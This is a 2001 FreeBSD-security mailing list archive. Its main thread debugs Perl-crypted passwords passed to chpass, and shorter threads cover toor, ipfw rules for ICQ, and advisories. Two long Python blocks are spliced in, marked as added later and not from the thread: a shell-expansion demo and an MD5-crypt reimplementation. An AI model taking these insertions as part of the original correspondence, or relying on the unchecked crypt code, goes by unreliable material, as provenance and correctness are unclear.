From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id XAA02163; Wed, 6 Jun 2001 23:09:51 +0700 (ICT) Date: Wed, 6 Jun 2001 23:09:51 +0700 (ICT) Message-Id: <200106061609.XAA02163@bazooka.cs.ait.ac.th> To: david@slis-two.lis.fsu.edu Cc: Olivier.Nicole@ait.ac.th, freebsd-security@FreeBSD.ORG In-reply-to: (message from David Miner on Wed, 6 Jun 2001 12:02:44 -0400 (EDT)) Subject: Re: Encrypted passwords Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >But when I encrypt them and put them in the passwd file, they do not allow >the user to log in. I have to use the passwd program to manually change >them to the same password that I wanted originally. Thus I believe the >problem lies in the encryption method or how it is being passed to the >chpass program. Hummm, I think nowadays passwords are not kept in a plain file but in a .db file. Can't it be the problem? Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:20:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id B7B5437B401 for ; Wed, 6 Jun 2001 09:20:23 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f56GM6S50951; Wed, 6 Jun 2001 12:22:06 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Wed, 6 Jun 2001 12:22:06 -0400 (EDT) 
From: David Miner To: Olivier Nicole Cc: Subject: Re: Encrypted passwords In-Reply-To: <200106061609.XAA02163@bazooka.cs.ait.ac.th> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 6 Jun 2001, Olivier Nicole wrote: > >But when I encrypt them and put them in the passwd file, they do not allow > >the user to log in. I have to use the passwd program to manually change > >them to the same password that I wanted originally. Thus I believe the > >problem lies in the encryption method or how it is being passed to the > >chpass program. > > Hummm, I think nowadays passwords are not kept in a plain file but in a > .db file. Can't it be the problem? > > Olivier > No, the chpass function takes care of calling mk-pwd and putting them in the .db file. Otherwise nothing would be there when I look at it with vipw. It appears that what is being passed by the crypt function is not what is making it into the passwd file. At a SWAG. David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:31:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-243.dsl.lsan03.pacbell.net [64.165.226.243]) by hub.freebsd.org (Postfix) with ESMTP id 6721837B401 for ; Wed, 6 Jun 2001 09:31:17 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 19A6F671A4; Wed, 6 Jun 2001 09:31:17 -0700 (PDT) Date: Wed, 6 Jun 2001 09:31:16 -0700 
From: Kris Kennaway To: Christopher Schulte Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts Message-ID: <20010606093116.C15460@xor.obsecurity.org> References: <200106051808.f55I8ik15444@freefall.freebsd.org> <5.1.0.14.0.20010605135437.0278eeb0@pop.schulte.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Izn7cH1Com+I3R9J" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.1.0.14.0.20010605135437.0278eeb0@pop.schulte.org>; from christopher@schulte.org on Tue, Jun 05, 2001 at 02:02:45PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Izn7cH1Com+I3R9J Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jun 05, 2001 at 02:02:45PM -0500, Christopher Schulte wrote: > At 11:08 AM 6/5/2001 -0700, you wrote: > >This patch has been verified to apply to FreeBSD 4.3-RELEASE and > >4.2-RELEASE; it may or may not apply to older, unsupported versions of > >FreeBSD. > > Can someone comment on the impact of applying this patch to a 4.2-STABLE > environment? One might assume since 4.2-S falls between 4.2-R and 4.3-R, > it would work? Not necessarily; we only support releases because it's too hard to make patches for every possible intermediate version. It turns out in this case the patch didn't even apply to 4.2-REL (needed a minor tweak) although I thought I tested it. 
Kris --Izn7cH1Com+I3R9J Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7HlrUWry0BWjoQKURAltfAJ0RRXWKyNFwx65KOW+0em1cp2zOxgCgjU89 +z80iK4ATHb4TkzRxRYhIKU= =4L6O -----END PGP SIGNATURE----- --Izn7cH1Com+I3R9J-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:31:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id 337E937B40A for ; Wed, 6 Jun 2001 09:31:33 -0700 (PDT) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f56MqdB08480; Thu, 7 Jun 2001 05:52:39 +0700 (ICT) 
From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id XAA02279; Wed, 6 Jun 2001 23:31:27 +0700 (ICT) Date: Wed, 6 Jun 2001 23:31:27 +0700 (ICT) Message-Id: <200106061631.XAA02279@bazooka.cs.ait.ac.th> To: david@slis-two.lis.fsu.edu Cc: freebsd-security@FreeBSD.ORG In-reply-to: (message from David Miner on Wed, 6 Jun 2001 12:22:06 -0400 (EDT)) Subject: Re: Encrypted passwords Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >It appears that what is being passed by the crypt function is not what is >making it into the passwd file. At a SWAG. Sounds weird. Does it work when you call it by hand? Does it work with a password that contains only alphanumeric characters? I wonder if crypt in Perl corresponds to crypt(3). There must be some reason somewhere... Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:31:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-243.dsl.lsan03.pacbell.net [64.165.226.243]) by hub.freebsd.org (Postfix) with ESMTP id 602E937B401 for ; Wed, 6 Jun 2001 09:31:45 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 1DB15671A4; Wed, 6 Jun 2001 09:31:45 -0700 (PDT) Date: Wed, 6 Jun 2001 09:31:45 -0700 
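An added example, not from the thread, of one concrete way a hash that looks right inside Perl can reach chpass mangled, which is the "call it by hand" check Olivier suggests. A FreeBSD MD5 crypt(3) result starts with $1$salt$; when the command is assembled as one string for the shell, as system("chpass -p $cryptpwd $name") does, /bin/sh expands $1, $salt and the hash body as variables before chpass runs, while a traditional DES hash (no $) passes through untouched, which matches the DES/MD5 hint earlier in the thread. Both sample hashes below are constructed strings with the right shape, not real crypt(3) output, and printf stands in for chpass so the comparison runs on any Unix.

```python
"""Show how an MD5-crypt hash gets mangled when handed to a shell unquoted."""
import subprocess

# Constructed: has the $1$<salt>$<hash> shape of a FreeBSD MD5 crypt(3)
# result but is not the hash of anything.
SAMPLE_HASH = "$1$abcdefgh$Qk3vLm9sPq2XwE7tYu4Ra1"
# Constructed: the shape of a traditional DES crypt(3) result (no '$').
SAMPLE_DES = "ab/cd.EFgh12Z"


def via_shell(value):
    """Build the command as one string and let /bin/sh split it, which is
    what Perl's system("chpass -p $cryptpwd $name") does.  The shell reads
    $1 (an unset positional parameter), $abcdefgh and $Qk3v... (unset
    variables) and replaces each with nothing before printf runs."""
    cmd = "printf '%s\\n' " + value
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=True)
    return out.stdout.rstrip("\n")


def via_argv(value):
    """Pass the value as its own argv element; no shell is involved, so
    chpass (here printf) receives the bytes exactly as crypt() produced
    them.  Perl equivalent: system('chpass', '-p', $cryptpwd, $name)."""
    out = subprocess.run(["printf", "%s\n", value], capture_output=True, text=True, check=True)
    return out.stdout.rstrip("\n")


if __name__ == "__main__":
    for h in (SAMPLE_HASH, SAMPLE_DES):
        print(f"crypt output : {h!r}")
        print(f"  via shell  : {via_shell(h)!r}")
        print(f"  via argv   : {via_argv(h)!r}")
```

The same shell pass also explains why a DES-only system would never show the symptom: there is nothing for the shell to expand. Whatever the hash format, keep the hash out of the shell entirely (list-form system() in Perl, an argv list in Python) rather than trying to quote it.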
From: Kris Kennaway
To: Vladimir Savichev
Cc: mikes@ct980320-b.blmngtn1.in.home.com, freebsd-security@freebsd.org
Subject: Re: rpc.statd attack before ipfw activated
Message-ID: <20010606093144.D15460@xor.obsecurity.org>
In-Reply-To: <20010605174214.J90423-100000@ariel.phys.wesleyan.edu>

On Tue, Jun 05, 2001 at 05:55:03PM -0400, Vladimir Savichev wrote:
> how interesting. I'm here on
> FreeBSD ariel.phys.wesleyan.edu 4.3-STABLE FreeBSD 4.3-STABLE #2: Sun Jun 3 21:23:38 EDT 2001
> root@ariel.phys.wesleyan.edu:/usr/obj/usr/src/sys/ARIEL i386
> I got pretty much similar log several times
> for a last couple of days, was wondering
> what the hell rpc is doing. Could you point me where I can
> read more about. How can I log call hosts.

See the archives; this comes up several times a week.
Kris

From owner-freebsd-security Wed Jun 6 9:34:06 2001
Date: Wed, 6 Jun 2001 17:35:21 +0100
From: Ceri
To: Olivier Nicole
Cc: david@slis-two.lis.fsu.edu, freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
Message-ID: <20010606173521.A23780@cartman.techsupport.co.uk>
In-Reply-To: <200106061631.XAA02279@bazooka.cs.ait.ac.th>

On Wed, Jun 06, 2001 at 11:31:27PM +0700, Olivier Nicole said:
>
> I wonder if crypt in Perl corresponds to crypt(3). There must be some
> reason somewhere...

Yeah, of course it does:

setantae@shaft setantae$ perldoc -f crypt
       crypt PLAINTEXT,SALT
               Encrypts a string exactly like the crypt(3) function in
               the C library (assuming that you actually have a version
               there that has not been extirpated as a potential
               munition). This can prove useful for checking the
               password file for lousy passwords, amongst other things.
               Only the guys wearing white hats should do this

Ceri

--
I probably wouldn't like you. Really. I really probably wouldn't like you.

From owner-freebsd-security Wed Jun 6 9:37:05 2001
Date: Wed, 6 Jun 2001 23:36:55 +0700 (ICT)
From: Olivier Nicole
To: ceri@techsupport.co.uk
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
Message-Id: <200106061636.XAA02297@bazooka.cs.ait.ac.th>
In-reply-to: <20010606173521.A23780@cartman.techsupport.co.uk> (message from Ceri on Wed, 6 Jun 2001 17:35:21 +0100)

> > I wonder if crypt in Perl corresponds to crypt(3). There must be some
> > reason somewhere...
>
> Yeah, of course it does:
>
> setantae@shaft setantae$ perldoc -f crypt
>        crypt PLAINTEXT,SALT

I'd assume it does, but I know I would check it anyway :)

Olivier

From owner-freebsd-security Wed Jun 6 9:54:20 2001
Date: Wed, 6 Jun 2001 12:54:00 -0400 (EDT)
From: Igor Roshchin
To: kris@obsecurity.org
Cc: security@freebsd.org
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts
Message-Id: <200106061654.MAA19725@giganda.komkon.org>
In-Reply-To: <20010606093116.C15460@xor.obsecurity.org>

Kris,

It looks like the 01:49 advisory was not sent to the FreeBSD-security or
-security-notifications mailing lists. I looked in the archives, and it is
not there either. I found it in freebsd-announce though.

Did the policy of where those advisories are sent change?

Regards,

Igor

From owner-freebsd-security Wed Jun 6 9:56:56 2001
Date: Wed, 6 Jun 2001 12:58:26 -0400 (EDT)
From: David Miner
To: Olivier Nicole
Subject: Re: Encrypted passwords
In-Reply-To: <200106061636.XAA02297@bazooka.cs.ait.ac.th>

On Wed, 6 Jun 2001, Olivier Nicole wrote:

> > > I wonder if crypt in Perl corresponds to crypt(3). There must be some
> > > reason somewhere...
> >
> > Yeah, of course it does:
> >
> > setantae@shaft setantae$ perldoc -f crypt
> >        crypt PLAINTEXT,SALT
>
> I'd assume it does, but I know I would check it anyway :)
>
> Olivier
>

If I knew how.

My "inspiration" for this was a series of messages back on May 2nd.

This is the main one I used for my example:

  Date: Wed, 2 May 2001 17:58:50 +0200
  From: Andrzej Groth
  To: freebsd-security@FreeBSD.ORG
  Subject: Re: useradd/adduser

  On Wed, 02 May 2001, Peter Pentchev wrote:
  > On Wed, May 02, 2001 at 06:02:57PM +0300, Peter Pentchev wrote:
  > > On Wed, May 02, 2001 at 03:59:50PM +0100, Lee Smallbone wrote:
  > > > I see what you mean about the synopsis...!
  > > >
  > > > From what I can see it isn't possible to supply the password to pw?
  > > > I'm using md5 passwords, and can easily have the script in question encode
  > > > the password prior to calling pw, so is it possible to use (in the verse of
  > > > pw), something along the lines of:
  > > >
  > > > pw useradd -n test -c "Test User" -d /home2/test -m -s sh $md5encpass
  > > >
  > > > ?

  so...

  pw useradd -n test -c "Test User" -d /home2/test -s /bin/sh; chpass -p $md5encpass test

  ? ;-)

  br.
  --
  Andrzej Groth

I changed it to a system call from perl and went on.

David
---------------------------------------------------------------------
David R. Miner                          miner@lis.fsu.edu
Systems Integrator                      voice: 850-644-8107
School of Information Studies           fax:   850-644-6253
Florida State University
Tallahassee, FL 32306-2100

From owner-freebsd-security Wed Jun 6 11:35:51 2001
Date: Wed, 6 Jun 2001 20:07:23 +0200
From: Axel Scheepers
To: freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
Message-ID: <20010606200723.A73395@surf.iae.nl>
In-Reply-To: message from david@slis-two.lis.fsu.edu on Wed, Jun 06, 2001 at 12:58:26PM -0400

Really weird,

I made a small mistake the other day which resulted in plaintext passwords
in the password database. I ran the db through perl using the crypt
function to generate the passwords and everything was ok again ...

How many characters are in the enc. pw field? There should be 13.

Hope this helps in a way ..

Gr,
Axel

On Wed, Jun 06, 2001 at 12:58:26PM -0400, David Miner wrote:
> On Wed, 6 Jun 2001, Olivier Nicole wrote:
>
> > > > I wonder if crypt in Perl corresponds to crypt(3). There must be some
> > > > reason somewhere...
> > >
> > > Yeah, of course it does:
> > >
> > > setantae@shaft setantae$ perldoc -f crypt
> > >        crypt PLAINTEXT,SALT
> >
> > I'd assume it does, but I know I would check it anyway :)
> >
> > Olivier
> >
> If I knew how.
>
> My "inspiration" for this was a series of messages back on May 2nd.
>
> This is the main one I used for my example:
>
> Date: Wed, 2 May 2001 17:58:50 +0200
> From: Andrzej Groth
> To: freebsd-security@FreeBSD.ORG
> Subject: Re: useradd/adduser
>
> On Wed, 02 May 2001, Peter Pentchev wrote:
>
> > On Wed, May 02, 2001 at 06:02:57PM +0300, Peter Pentchev wrote:
> > > On Wed, May 02, 2001 at 03:59:50PM +0100, Lee Smallbone wrote:
> > > > I see what you mean about the synopsis...!
> > > >
> > > > From what I can see it isn't possible to supply the password to pw?
> > > > I'm using md5 passwords, and can easily have the script in question encode
> > > > the password prior to calling pw, so is it possible to use (in the verse of
> > > > pw), something along the lines of:
> > > >
> > > > pw useradd -n test -c "Test User" -d /home2/test -m -s sh $md5encpass
> > > >
> > > > ?
>
> so...
> pw useradd -n test -c "Test User" -d /home2/test -s /bin/sh; chpass -p $md5encpass test
>
> ? ;-)
>
> br.
> --
> Andrzej Groth
>
>
> I changed it to a system call from perl and went on.
>
> David
> ---------------------------------------------------------------------
> David R. Miner                          miner@lis.fsu.edu
> Systems Integrator                      voice: 850-644-8107
> School of Information Studies           fax:   850-644-6253
> Florida State University
> Tallahassee, FL 32306-2100

--
Kind regards,

VIA NET.WORKS Nederland
Axel Scheepers
Operations
phone +31 40 239 33 93
fax +31 40 239 33 11
e-mail eindhoven.beheer@vianetworks.nl
http://www.vianetworks.nl/

From owner-freebsd-security Wed Jun 6 11:58:23 2001
Date: Wed, 6 Jun 2001 21:57:04 +0300
From: Peter Pentchev
To: Axel Scheepers
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
Message-ID: <20010606215704.G1104@ringworld.oblivion.bg>
In-Reply-To: <20010606200723.A73395@surf.iae.nl>

On Wed, Jun 06, 2001 at 08:07:23PM +0200, Axel Scheepers wrote:
> Really weird,
> I made a small mistake the other day which resulted in plaintext passwords in the
> password database. I ran the db through perl using the crypt function to generate
> the passwords and everything was ok again ...
> How many characters are in the enc. pw field? There should be 13.

13 in case of DES, quite a lot more in case of MD5.

G'luck,
Peter

--
When you are not looking at it, this sentence is in Spanish.

From owner-freebsd-security Wed Jun 6 12:20:44 2001
Date: Wed, 6 Jun 2001 15:22:22 -0400 (EDT)
From: David Miner
To: Axel Scheepers
Subject: Re: Encrypted passwords
In-Reply-To: <20010606200723.A73395@surf.iae.nl>

On Wed, 6 Jun 2001, Axel Scheepers wrote:

> Really weird,
> I made a small mistake the other day which resulted in plaintext passwords in the
> password database. I ran the db through perl using the crypt function to generate
> the passwords and everything was ok again ...
> How many characters are in the enc. pw field? There should be 13.
>
> Hope this helps in a way ..
> Gr,
> Axel
>

Just tried again and looked with vipw. They are 13 characters long.

David
---------------------------------------------------------------------
David R. Miner                          miner@lis.fsu.edu
Systems Integrator                      voice: 850-644-8107
School of Information Studies           fax:   850-644-6253
Florida State University
Tallahassee, FL 32306-2100

From owner-freebsd-security Wed Jun 6 19:00:12 2001
Date: Thu, 7 Jun 2001 08:59:56 +0700 (ICT)
Message-Id: <200106070159.IAA25340@banyan.cs.ait.ac.th>
From: Olivier Nicole
To: david@slis-two.lis.fsu.edu
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted passwords
In-reply-to: (message from David Miner on Wed, 6 Jun 2001 12:58:26 -0400 (EDT))

David,

> I changed it to a system call from perl and went on.

As a first step I would try to make sure the system call is what I really
want: replace `system' with `print' and carefully check for any strange
character. I'd be especially suspicious about the contents of that variable
that holds the password.

Second, I would consider that the system call is made under the Bourne
shell; it may have a different environment than the shell you use for
everyday work, and it may simply be missing some environment variable.

I understood you run the script as root; it is not a setuid script? Else
you'd need to untaint the variables.

As a last resort, I'd copy the script, remove all the fancy interface and
keep only the system call. Try to split it, add some print, some pw
usershow, etc.

Is your system running NIS? It could be a problem that the new user has not
yet propagated through NIS and then the password cannot be set...

Olivier
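The checks proposed in this thread (Axel's and Peter's "13 characters for DES, quite a lot more for MD5", Olivier's "print the command before you run it and look for strange characters") collected into one script. This is an added example, not code any poster sent: the MD5-crypt routine is a Python rendition of the classic FreeBSD crypt-md5 algorithm so the script runs without Python's deprecated `crypt` module, the DES form is only recognised and not generated, and the user name and passwords in the demo are made up. One caveat worth having in mind while debugging: an MD5 field contains `$` characters, and a Perl `system("chpass -p $hash user")` whose command string contains shell metacharacters goes through /bin/sh, which will try to expand them; building the argv as a list keeps the shell out of it.

```python
"""Build and sanity-check crypt(3)-style password fields before `chpass -p` sees them.

Added example for this thread, not code any poster sent. MD5-crypt ("$1$") is
re-done here from the classic FreeBSD crypt-md5 algorithm so the script runs
without Python's deprecated `crypt` module; DES fields (13 chars) are only
recognised, not generated. The user name and passwords in the demo are made up.
"""
import hashlib
import secrets

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def make_salt(length=8):
    """Random salt from the crypt(3) alphabet: 2 chars for DES, up to 8 for MD5."""
    return "".join(secrets.choice(ITOA64) for _ in range(length))


def _to64(value, count):
    """crypt's base-64: `count` characters, six bits each, least significant first."""
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def md5_crypt(password, salt):
    """MD5-crypt as in FreeBSD's crypt-md5.c: returns '$1$<salt>$<22 chars>', 34 chars."""
    magic, pw = b"$1$", password.encode()
    if salt.startswith("$1$"):                # accept a full '$1$salt$...' field too
        salt = salt[3:]
    sp = salt.split("$", 1)[0][:8].encode()   # salt ends at '$', at most 8 chars

    ctx = hashlib.md5(pw + magic + sp)
    alt = hashlib.md5(pw + sp + pw).digest()
    for left in range(len(pw), 0, -16):       # as many bytes of alt as pw is long
        ctx.update(alt[:min(16, left)])
    bits = len(pw)
    while bits:                               # the "something really weird" step
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()

    for i in range(1000):                     # stretching loop, same schedule as the C
        c1 = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c1.update(sp)
        if i % 7:
            c1.update(pw)
        c1.update(final if i & 1 else pw)
        final = c1.digest()

    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    body = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                   for a, b, c in groups) + _to64(final[11], 2)
    return (magic + sp).decode() + "$" + body


def classify_field(field):
    """The '13 characters' check from the thread, extended to MD5 and locked fields."""
    if field in ("", "*"):
        return "empty or locked"
    if len(field) == 13 and all(ch in ITOA64 for ch in field):
        return "des"
    if field.startswith("$1$") and len(field) == 34:
        return "md5"
    return "not a crypt(3) hash (plaintext?)"


def chpass_argv(user, hashed):
    """argv for `chpass -p`, as a list: no shell ever gets to expand the '$' in an MD5 hash."""
    return ["chpass", "-p", hashed, user]


if __name__ == "__main__":
    h = md5_crypt("correct horse battery", make_salt())
    print(h, len(h), classify_field(h), chpass_argv("testuser", h))
    # subprocess.run(chpass_argv("testuser", h), check=True)  # root on FreeBSD only
```

Run it and compare the printed field with what `vipw` shows after a manual `passwd`: a DES field is 13 characters from the `./0-9A-Za-z` alphabet, an MD5 field is `$1$`, up to 8 salt characters, `$` and 22 more; anything else in that column (a plaintext string, a field with the `$`-parts missing) points at the script or the shell rather than at chpass.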
From owner-freebsd-security Thu Jun 7 2:58:19 2001
From: mudman
To: freebsd-security@freebsd.org
Subject: root & toor
Date: Thu, 7 Jun 2001 04:05:59 -0700 (PDT)

What is the user "toor" for? I suspect it is a security implementation
somehow based on the reversed spelling of "root," but its detailed
significance is not known to me.

From owner-freebsd-security Thu Jun 7 3:01:33 2001
From: "Andy [Tecc Nops]"
To: "mudman", freebsd-security@freebsd.org
Subject: RE: root & toor
Date: Thu, 7 Jun 2001 11:01:27 +0100

http://www.freebsd.org/cgi/getmsg.cgi?fetch=1805198+0+/usr/local/www/db/text/2000/freebsd-questions/20000319.freebsd-questions

Regards
Ak

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of mudman
> Sent: 07 June 2001 12:06
> To: freebsd-security@freebsd.org
> Subject: root & toor
>
> What is the user "toor" for? I suspect it is a security implementation
> somehow based on the reversed spelling of "root," but its detailed
> significance is not known to me.

From owner-freebsd-security Thu Jun 7 3:03:25 2001
Date: Thu, 7 Jun 2001 10:03:09 +0000 (GMT)
From: Domas Mituzas
To: mudman
Subject: Re: root & toor
Message-ID: <20010607100241.N30276-100000@axis.tdd.lt>

> What is the user "toor" for? I suspect it is a security implementation
> somehow based on the reversed spelling of "root," but its detailed
> significance is not known to me.

toor has the Bourne shell, root has the C shell. The only difference, afaik.

Regards,
Domas Mituzas

From owner-freebsd-security Thu Jun 7 6:29:24 2001
Message-ID: <009e01c0ef55$da422340$9201a8c0@home.net>
From: "edwin chan"
To: "David Miner", "Olivier Nicole"
Subject: Re: Encrypted passwords
Date: Thu, 7 Jun 2001 21:28:21 +0800

I think that: you have a user list, and you can make a random password for
them, then you can use "expect" and "passwd user" to do your job and not
worry about how chpass works.

----- Original Message -----
From: David Miner
To: Olivier Nicole
Sent: Thursday, June 07, 2001 12:22 AM
Subject: Re: Encrypted passwords

> On Wed, 6 Jun 2001, Olivier Nicole wrote:
>
> > > But when I encrypt them and put them in the passwd file, they do not allow
> > > the user to log in. I have to use the passwd program to manually change
> > > them to the same password that I wanted originally. Thus I believe the
> > > problem lies in the encryption method or how it is being passed to the
> > > chpass program.
> >
> > Hummm, I think nowadays passwords are not kept in a plain file but in a
> > .db file. Can't it be the problem?
> >
> > Olivier
> >
> No, the chpass function takes care of calling mk-pwd and putting them in the
> .db file. Otherwise nothing would be there when I look at it with vipw.
>
> It appears that what is being passed by the crypt function is not what is
> making it into the passwd file. At a SWAG.
>
> David
> ---------------------------------------------------------------------
> David R. Miner                          miner@lis.fsu.edu
> Systems Integrator                      voice: 850-644-8107
> School of Information Studies           fax:   850-644-6253
> Florida State University
> Tallahassee, FL 32306-2100

From owner-freebsd-security Thu Jun 7 7:00:12 2001
Date: Thu, 7 Jun 2001 18:00:37 +0400
From: "Nikolaj I. Potanin"
To: freebsd-security@FreeBSD.ORG
Subject: ipfw and icq
Message-ID: <1569370004.20010607180037@mail.spbnit.ru>
Organization: Magistral Merkantil AB

Hello to every GURU in this list!

I'm a novice in this world :) and I have a problem configuring the
firewall (ipfw) and icq on my FreeBSD 4.2 box. I'm using a PPP connection
to my ISP and therefore there are some differences in configuring ipfw
(or not?). Everything works perfectly, the firewall filters all it has to,
but I didn't manage to connect to my favorite icq.mirabilis.com:4000 %)
I know that I should add something like

$fwcmd add allow udp from any to any 4000

But it doesn't work! Here is my fwrules file:

fwcmd="/sbin/ipfw"
$fwcmd -f flush
$fwcmd add divert natd all from any to any via tun0
$fwcmd add allow ip from any to any via lo0
$fwcmd add allow tcp from any to any out xmit tun0 setup
$fwcmd add allow tcp from any to any via tun0 established
$fwcmd add allow tcp from any to any 80 setup
$fwcmd add allow tcp from any to any 22 setup
$fwcmd add reset log tcp from any to any 113 in recv tun0
$fwcmd add allow udp from any to MY_ISP'S_DNS_NUMBER 53 out xmit tun0
$fwcmd add allow udp from MY_ISP'S_DNS_NUMBER 53 to any in recv tun0
$fwcmd add 65435 allow icmp from any to any
$fwcmd add 65435 deny log ip from any to any

Maybe it's because of [options TCP_RESTRICT_RST] added to my CUSTOM_KERNEL
config file? Any ideas about this problem?

Thanks in advance,
==
Nikolaj I. Potanin
http://www.physto.se/~nikolaj
UIN: 20582042

From owner-freebsd-security Thu Jun 7 7:38:03 2001
Date: Thu, 7 Jun 2001 18:36:18 +0400
From: 3APA3A <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.51) Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Organization: http://www.security.nnov.ru X-Priority: 3 (Normal) Message-ID: <86117967378.20010607183618@SECURITY.NNOV.RU> To: "Nikolaj I. Potanin" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw and icq In-Reply-To: <1569370004.20010607180037@mail.spbnit.ru> References: <009e01c0ef55$da422340$9201a8c0@home.net> <1569370004.20010607180037@mail.spbnit.ru> MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Nikolaj, You've allowed only outgoing traffic, but you also need to allow incoming one. Allowing UDP 4000 for all ports from whole Internet is huge security risk, you should limit port range and allowed network. In this case: allow udp from any 1024-65535 to 205.188.153.0/24 4000 allow udp from 205.188.153.0/24 4000 to any 1024-65535 This will work for ICQ up to 99 and licq/micq. Icq 2000 works different way - it uses TCP and first connects login.icq.com and then it's redirected to another server in the AOL Network. It's better to have incoming and outgoing lists for internal and external interface (and DMZ if you have one) in this case you can allow ICQ with something like: allow udp from any 1024-65535 to 205.188.153.0/24 4000 out via ext allow udp from 205.188.153.0/24 4000 to any 1024-65535 in via ext in this case you can also allow any outgoing TCP connections for ICQ 2000 to work: allow tcp from any 1024-65535,20 to any out via ext allow tcp from any to any 1024-65535,20 in via ext established For internal interface you can create list to only limit access to router itself. In any case in your configuration you will have problems with incoming direct connections with another ICQ users. 
You will be able only communicate via server (some unix ICQ clients always communicate via server), or connection may be established by your request if you allow outgoing TCP. If you use Windows ICQ client and you want to allow incoming direct connections (by request of your interlocutor) you can create port mappings of port ranges (approx. 50-70 ports for each host) and configure ICQ for each host to use external IP and this port range, or you can configure socks5 on your router. --Thursday, June 07, 2001, 6:00:37 PM, you wrote to freebsd-security@FreeBSD.ORG: NIP> Hello to every GURU in this list! NIP> I'm a novice in this world :) and I have problem configuring NIP> firewall(ipfw) and icq on my FreeBSD4.2-box. I'm using a PPP connection NIP> to my ISP and therefore there are some differences in configuring ipfw NIP> (or not?). Everything works perfect, firewall filters all is has to, but NIP> I didn't manage to connect to my favorite icq.mirabilis.com:4000 %)I NIP> know that I should add something like NIP> $fwcmd add allow udp from any to any 4000 NIP> But it doesn't work! NIP> Here is my fwrules-file: NIP> fwcmd="/sbin/ipfw" NIP> $fwcmd -f flush NIP> $fwcmd add divert natd all from any to any via tun0 NIP> $fwcmd add allow ip from any to any via lo0 NIP> $fwcmd add allow tcp from any to any out 